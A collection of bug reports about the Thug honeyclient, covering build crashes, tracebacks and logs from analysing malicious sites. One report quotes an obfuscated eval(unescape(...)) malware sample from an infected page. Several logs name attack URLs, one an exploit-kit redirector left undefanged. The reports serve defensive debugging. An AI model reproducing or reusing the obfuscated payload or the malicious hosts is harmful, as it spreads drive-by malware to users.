IndexError: RangeError: RangeError: list index out of range (  @ 7 : 8 )  -> document.body.oncopy = function () (  @ 1 : 9 )  -> document.writeln("<table width=\"720\" border=\"0\" cellspacing=\"0\" cellpadd

I would like to suggest another option to directly specify an output directory (self.baseDir) on the commandline let's say -d outdir. I have come across the THUG_LOGBASE evironment variable in the code but not in the documentation but that is not sufficient. I want to exactly be able to specify the output directory without any timestamp or url hashing. I could do this functionality on my own and send you a pull request if that is ok.

First of all, thank you for your great project!
While using it for my needs, I've encountered a problem. While trying to investigate, I reduced it to the next minimal code enough to reproduce.

Reproduction:

thug.html:

<html>
<body>
<script>
x = 1;
document.write("<script src='thug.js'></"+"script>");
</script>
</body>
</html>

thug.js

x = x + 1;
document.write("<script src='"+x+".js'></"+"script>");

Browser tries to redirect to '2', thug tries to bring /2.js and then /3.js
I see the DOM/HTMLDocument running Eval() twice on the code.

Is there any way I can help you debug it? (I tried debugging it, but failed to the js/external_js/write() code logic)

I'm following the steps in the Thug README and I'm unable to build a version of PyV8 that doesn't SegFault and core dump. I've tried on multiple OS's (Debian 6 i386 and AMD64, Ubuntu Server 12.04.2 i386) all with the same result. To recreate:

1. Fresh install of Ubuntu Server 12.04.2 i386
2. sudo aptitude update
3. sudo aptitude upgrade
4. sudo aptitude install build-essential subversion libboost-dev libboost-python-dev libboost-thread-dev libboost-system-dev python-pip python-dev git
5. git clone https://github.com/buffer/thug.git

Now copy/paste steps 1-7 from the Thug README: https://github.com/buffer/thug

This is the result of Step 7:

~/pyv8 $ python PyV8.py
.F...........................FF.Segmentation fault (core dumped)

If I run verbose:

~/pyv8 $ python PyV8.py -v
2013-03-10 16:54:52,995 INFO testing PyV8 module 1.0 with V8 v3.17.9
testBlock (__main__.TestAST) ... ok
testCallStatements (__main__.TestAST) ... FAIL
testForStatement (__main__.TestAST) ... ok
testIfStatement (__main__.TestAST) ... ok
testLiterals (__main__.TestAST) ... ok
testOperations (__main__.TestAST) ... ok
testTryStatements (__main__.TestAST) ... ok
testMultiNamespace (__main__.TestContext) ... ok
testEventDispatch (__main__.TestDebug) ... 2013-03-10 16:54:53,018 DEBUG receive debug event: before compile script: <script script  @ 0:0> : 'function test() { text = "1+2"; return eval(text) } test()'

2013-03-10 16:54:53,020 DEBUG receive debug event: after compile script: <script script  @ 0:0> : 'function test() { text = "1+2"; return eval(text) } test()'

2013-03-10 16:54:53,023 DEBUG receive debug event: before compile script: <script script None @ 0:0> : '1+2'
#00 test() [unnamed] line 1 column 45 (position 45)#01 [anonymous]() [unnamed] line 1 column 53 (position 53)
2013-03-10 16:54:53,025 DEBUG receive debug event: after compile script: <script script None @ 0:0> : '1+2'
#00 test() [unnamed] line 1 column 45 (position 45)#01 [anonymous]() [unnamed] line 1 column 53 (position 53)
ok
testClassProperties (__main__.TestEngine) ... ok
testCompile (__main__.TestEngine) ... ok
testEval (__main__.TestEngine) ... ok
testExtension (__main__.TestEngine) ... ok
testGlobal (__main__.TestEngine) ... ok
testMemoryAllocationCallback (__main__.TestEngine) ... ok
testNativeExtension (__main__.TestEngine) ... ok
testObjectBuildInMethods (__main__.TestEngine) ... ok
testPrecompile (__main__.TestEngine) ... ok
testPythonWrapper (__main__.TestEngine) ... ok
testThis (__main__.TestEngine) ... ok
testUnicodeSource (__main__.TestEngine) ... ok
testLocker (__main__.TestMultithread) ... ok
testMultiJavascriptThread (__main__.TestMultithread) ... ok
testMultiPythonThread (__main__.TestMultithread) ... ok
testArray (__main__.TestWrapper) ... ok
testAutoConverter (__main__.TestWrapper) ... ok
testCall (__main__.TestWrapper) ... ok
testClassicStyleObject (__main__.TestWrapper) ... ok
testConstructor (__main__.TestWrapper) ... ok
testDate (__main__.TestWrapper) ... FAIL
testDestructor (__main__.TestWrapper) ... FAIL
testDict (__main__.TestWrapper) ... ok
testErrorInfo (__main__.TestWrapper) ... Segmentation fault (core dumped)

URL = http://dnf2020[DOT]com/?qqdrsign=03eca

[2012-08-28 13:08:54] [Shellcode Analysis] URL Detected: http://c.cnzz[DOT]com/cnzz_core.php?web_id=2151914&show=pic&l=none
[2012-08-28 13:08:55] [HTTP] URL: http://c.cnzz[DOT]com/cnzz_core.php?web_id=2151914&show=pic&l=none (Status: 200, Referrer: http://dnf2020[DOT]com/?qqdrsign=03eca)
[2012-08-28 13:08:55] Saving remote content at http://c.cnzz[DOT]com/cnzz_core.php?web_id=2151914&show=pic&l=none (MD5: b9a91e0d1ea662e13c96fdbe70d01b99)

Traceback (most recent call last):
  File "looper.py", line 14, in <module>
    thug.Thug((url.strip(),))()
  File "/home/ubuntu/thug/src/thug.py", line 170, in __call__
    self.analyze()
  File "/home/ubuntu/thug/src/thug.py", line 316, in analyze
    p(args[0])
  File "/home/ubuntu/thug/src/thug.py", line 230, in run_remote
    self.run(window)
  File "/home/ubuntu/thug/src/thug.py", line 208, in run
    dft.run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 648, in run
    self._run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 638, in _run
    self.handle_window_event(evt)
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 267, in handle_window_event
    handler()
ReferenceError: ReferenceError: welcometext is not defined (  @ 1 : 68 )  -> ument) { with(this.form || {}) { with(this) { event = window.event; welcometex

Thug behaves differently if you pass http:/ or http:// (He actually fails to access if the URL is 'broken' in this way). I just checked Chrome and noticed that Chrome fixes the 'typo'. I guess this would be an easy evasion if you put this in a redirect. I have also seen quite a number of such URLs.

screenshot here:

this is from a blackhole EK redirector.

Tried running a fully up-to-date instance of thug and got the following. (Side note, that's a bad URL, I really don't recommend clicking it from a regular browser, just in case it comes back up.)

[2013-02-21 14:14:15] [window open redirection] about:blank -> http://nikweinstein.com/cl/google.php
[2013-02-21 14:14:15] [window open redirection] about:blank -> http://nikweinstein.com/cl/google.php
[2013-02-21 14:14:15] about:blank -- window open --> http://nikweinstein.com/cl/google.php
[2013-02-21 14:14:16] [HTTP] URL: http://nikweinstein.com/cl/google.php (Status: 404, Referrer: None)
[2013-02-21 14:14:16] [HTTP] URL: http://nikweinstein.com/cl/google.php (Status: 404, Referrer: None)
[2013-02-21 14:14:16] Saving log analysis at ../logs/1e3184a6b49aa23fe1b6f36ea863fd1f/20130221141415
Traceback (most recent call last):
  File "thug.py", line 435, in <module>
    Thug(sys.argv[1:])()
  File "thug.py", line 246, in __call__
    self.analyze()
  File "thug.py", line 430, in analyze
    log.ThugLogging.log_event()
  File "/home/thug/Desktop/thug/src/Logging/ThugLogging.py", line 78, in log_event
    self.JSONLog.export(self.baseDir)
  File "/home/thug/Desktop/thug/src/Logging/JSONLog.py", line 138, in export
    m.write_svg()
  File "/home/thug/Desktop/thug/src/Logging/Mapper.py", line 209, in write_svg
    res = call(cmd)
  File "/usr/lib/python2.7/subprocess.py", line 493, in call
    return Popen(*popenargs, **kwargs).wait()
  File "/usr/lib/python2.7/subprocess.py", line 679, in __init__
    errread, errwrite)
  File "/usr/lib/python2.7/subprocess.py", line 1259, in _execute_child
    raise child_exception
OSError: [Errno 2] No such file or directory

URL: http://gall.dcgame[DOT]in/list.php?id=game_classic&no=8536

[2012-08-28 12:47:46] [HTTP] URL: http://gall.dcgame[DOT]in/js/json_common.js (Status: 200, Referrer: http://gall.dcgame[DOT]in/list.php?id=game_classic&no=8536)

Traceback (most recent call last):
  File "looper.py", line 14, in <module>
    thug.Thug((url.strip(),))()
  File "/home/ubuntu/thug/src/thug.py", line 170, in __call__
    self.analyze()
  File "/home/ubuntu/thug/src/thug.py", line 316, in analyze
    p(args[0])
  File "/home/ubuntu/thug/src/thug.py", line 230, in run_remote
    self.run(window)
  File "/home/ubuntu/thug/src/thug.py", line 208, in run
    dft.run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 648, in run
    self._run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 632, in _run
    handler(child)
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 386, in handle_script
    handler(script)
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 413, in handle_javascript
    self.handle_external_javascript(script)
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 405, in handle_external_javascript
    self.window.evalScript(js, tag = script)
  File "/home/ubuntu/thug/src/DOM/Window.py", line 767, in evalScript
    result    = shellcode.run()
  File "/home/ubuntu/thug/src/Debugger/Shellcode.py", line 80, in run
    result = self.ctxt.eval(self.script.decode(enc['encoding']))
ReferenceError: ReferenceError: can't set attribute (  @ 340 : 19 )  ->                         document.domain = "dcgame.in";

Traceback (most recent call last):
File "thug.py", line 202, in
Thug(sys.argv[1:])()
File "/home/work/samba/depedency/thug/src/ThugAPI/ThugAPI.py", line 61, in call
self.analyze()
File "thug.py", line 193, in analyze
p(args[0])
File "/home/work/samba/depedency/thug/src/ThugAPI/ThugAPI.py", line 203, in run_remote
self.run(window)
File "/home/work/samba/depedency/thug/src/ThugAPI/ThugAPI.py", line 179, in run
dft.run()
File "/home/work/samba/depedency/thug/src/DOM/DFT.py", line 1044, in run
with self.context as ctx:
File "/home/work/samba/depedency/thug/src/DOM/DFT.py", line 124, in context
self._context = self.window.context
File "/home/work/samba/depedency/thug/src/DOM/Window.py", line 851, in context
ctxt.eval(open(sessionstorage_js, 'r').read())
LookupError: unknown encoding:

Window.unescape does something strange that breaks last thug if unescape is used in javascript.

Did not quite figure out what is going on there and not fluent in pyhton, but replacing its content with "return urllib.unquote(s)" fixes it for me.

Example piece of infected page triggering the error:

eval(unescape('%66%75%6e%63%74%69%6f%6e%20%6c%32%37%63%32%64%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%32%34%33%34%38%35%35%31%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%35%36%39%36%34%30%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%2d%31%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%6c%32%37%63%32%64%28%27') + '%38%6a%61%7a%6b%69%6f%24%72%7a%62%3a%23%6c%75%73%78%32%37%39%67%63%6e%76%60%2f%73%74%36%3b%3f%34%3c%3f%33%3a%31%3e%37%3d%37%3f%3f%2a%26%71%6f%63%7c%6f%3a%23%34%23%27%60%6f%6d%61%6c%73%37%25%35%23%24%67%75%6b%67%61%6a%75%75%6c%60%77%3e%26%31%25%36%34%37%63%62%75%6b%68%62%3f%0b%0b%08%02%34%6d%6e%76%64%67%60%25%74%76%64%38%2a%60%72%7c%74%3d%39%36%66%65%62%70%62%26%7f%73%39%37%30%3a%33%3e%35%36%38%34%3d%3f%31%3c%30%25%28%7e%6e%65%70%69%38%2a%38%24%28%6c%60%63%6e%6d%75%3b%23%37%2a%28%60%7a%67%68%6f%65%74%73%60%66%75%37%2a%36%2a%3a%3b%39%6c%63%73%67%6e%60%36%07%0c%07%0e%3b%63%61%77%62%6b%66%27%7d%7a%63%37%26%6f%7c%73%75%3b%35%30%64%6c%6e%77%6d%2a%70%7d%36%36%36%36%35%3c%3c%3a%30%30%36%3e%3b%31%3e%23%24%78%6c%6c%7c%6e%37%26%37%2a%27%6d%66%6f%68%6f%7c%37%24%38%26%27%6e%75%66%6e%63%63%76%7a%6c%61%7a%3b%25%38%25%3b%3d%35%6a%61%7a%6b%69%6f%3a%08%02%08%0f%3d%6f%67%75%6b%67%61%28%71%75%6d%38%27%69%70%75%77%32%39%37%6b%60%61%79%62%2b%76%71%30%34%3f%3a%32%33%30%35%3e%3f%37%38%37%37%32%2a%28%7f%63%60%73%60%38%27%31%26%21%6f%6f%63%6f%60%70%38%2a%37%27%21%62%73%64%67%6f%64%79%76%63%6f%75%3a%23%34%23%39%34%39%6d%6e%76%64%67%60%3b%0e%0e%0e%0d%34%63%60%7a%67%68%6f%27%70%73%61%3e%25%60%7c%72%78%3e%36%39%64%61%67%75%64%29%7f%7d%37%3b%33%35%3c%3c%31%33%3d%32%32%3f%31%34%33%26%27%71%6c%61%75%6c%3e%25%38%2a%26%60%63%6c%61%6f%71%3e%26%31%25%28%6e%74%6b%6b%60%6a%76%77%65%63%73%38%2a%38%24%36%38%36%63%61%77%62%6b%66%39%07%02%09%02%38%6c%6e%75%66%6e%63%21%72%7a%6d%39%2a%6c%73%7c%77%3f%30%35%63%6c%7c%26%6a%73%35%34%3f%4d%5f%77%70%44%25%28%71%6d%6c%70%6f%37%25%35%23%24%69%60%63%61%6e%7c%3b%25%38%25%25%67%76%62%68%6f%6a%77%7a%60%60%7a%38%27%31%26%3f%3b%39%63%60%7a%67%68%6f%39%0a%0b%0b%0b%3b%63%6e%74%6b%6b%60%28%72%77%64%3b%23%6f%7c%7c%76%32%35%36%6a%6c%71%2f%68%7a%36%3b%6b%6c%3b%30%5e%7e%25%25%78%6f%65%73%60%37%24%38%26%27%60%60%6e%68%6c%75%38%2a%38%24%28%62%75%6b%68%62%63%75%73%63%6f%7a%39%2a%34%25%36%3b%34%6a%62%73%64%67%6f%3824348551%35%30%36%39%39%37%39' + unescape('%27%29%29%3b'));

URL = http://rghost[DOT]net/40005350

[2012-08-28 12:20:44] [HTTP] URL: http://rghost[DOT]net/40005350 (Status: 200, Referrer: None)
[2012-08-28 12:20:44] <meta charset="utf-8"/>
[2012-08-28 12:20:44] <meta content="BoxyBot Bpd - Laucha 2.0.rar. download BoxyBot Bpd - Laucha 2.0.rar. Fast and free download from rghost" name="description"/>
[2012-08-28 12:20:44] <meta content="BoxyBot Bpd - Laucha 2.0.rar, download BoxyBot Bpd - Laucha 2.0.rar, BoxyBot, Bpd, , , Laucha, 2, 0, rar, download %{name}, rghost" name="keywords"/>
[2012-08-28 12:20:44] <meta content="authenticity_token" name="csrf-param"/>
[2012-08-28 12:20:44] <meta content="c5fnb3JBAZ5uDW1faqJk2IpZ7FqpqfTeB/5uqVEperg=" name="csrf-token"/>
[2012-08-28 12:20:44] [Navigator URL Translation] /assets/application-97efb9f47713620544f0d89ed5799ed3.js -->  http://rghost[DOT]net/assets/application-97efb9f47713620544f0d89ed5799ed3.js
[2012-08-28 12:20:45] [HTTP] URL: http://rghost[DOT]net/assets/application-97efb9f47713620544f0d89ed5799ed3.js (Status: 200, Referrer: http://rghost[DOT]net/40005350)
[2012-08-28 12:20:47] ActiveXObject: microsoft.xmlhttp
[2012-08-28 12:20:47] ActiveXObject: shockwaveflash.shockwaveflash

Traceback (most recent call last):
  File "looper.py", line 10, in <module>
    thug.Thug((url.strip(),))()
  File "/home/ubuntu/thug/src/thug.py", line 170, in __call__
    self.analyze()
  File "/home/ubuntu/thug/src/thug.py", line 316, in analyze
    p(args[0])
  File "/home/ubuntu/thug/src/thug.py", line 230, in run_remote
    self.run(window)
  File "/home/ubuntu/thug/src/thug.py", line 208, in run
    dft.run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 648, in run
    self._run()
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 632, in _run
    handler(child)
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 386, in handle_script
    handler(script)
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 413, in handle_javascript
    self.handle_external_javascript(script)
  File "/home/ubuntu/thug/src/DOM/DFT.py", line 405, in handle_external_javascript
    self.window.evalScript(js, tag = script)
  File "/home/ubuntu/thug/src/DOM/Window.py", line 767, in evalScript
    result    = shellcode.run()
  File "/home/ubuntu/thug/src/Debugger/Shellcode.py", line 80, in run
    result = self.ctxt.eval(self.script.decode(enc['encoding']))
NotImplementedError: method cloneNode is abstract.

I have successfully installed V8 and PyV8. i have tested it and the result is OK.

but while i was executing python thug.py -h,, the error was appeared. the errors look like:

root@ubuntu:/home/kafin/thug/src# sudo python thug.py -h
Traceback (most recent call last):
File "thug.py", line 31, in
from DOM import Window, DFT, MIMEHandler, SchemeHandler
File "/home/kafin/thug/src/DOM/Window.py", line 32, in
from .Location import Location
File "/home/kafin/thug/src/DOM/Location.py", line 22, in
import DFT
File "/home/kafin/thug/src/DOM/DFT.py", line 20, in
import pylibemu
ImportError: libemu.so.2: cannot open shared object file: No such file or directory

anyone got also this error, or how do i solve this?

thanks